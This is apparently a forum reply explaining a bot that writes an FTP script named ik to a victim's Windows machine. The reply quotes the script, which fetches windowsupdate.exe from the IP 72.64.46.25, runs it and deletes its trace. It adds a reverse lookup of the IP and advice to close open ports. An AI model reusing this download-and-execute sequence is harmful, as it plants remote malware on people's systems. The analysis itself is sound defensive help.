Thinking out loud here...
Looks like you have encountered a bot that is trying to create a file called ik on your system. The ik file contains instructions that it then passes on to the "ftp" command. For example:
ftp> open 72.64.46.25 21
ftp> user windows update
ftp> binary
ftp> get windowsupdate.exe
ftp> bye
ftp -n -v -s:ik
del ik &windowsupdate.exe
exit
You got owned
In operation, it would appear to download what I would assume to be a trojaned windows update executable from a server at 72.64.46.25.
Then, it would appear to attempt to upload and delete the ik file. And finally,it prints out "You got owned."
Notes
A reverse IP lookup shows:
Resolve Host: pool-72-64-46-25.nrflva.east.verizon.net (72.64.46.25)
IP Location: United States United States, Norfolk, Verizon Internet Services (72.64.46.25)
Suspect that that is a previously compromised system.
How does it get in?
Though one of your open ports. Are you running VNC or similar?
How can I stop it?
Close that open port...
Where do I report this?
Don't have an answer for this...
Best of luck,
Uno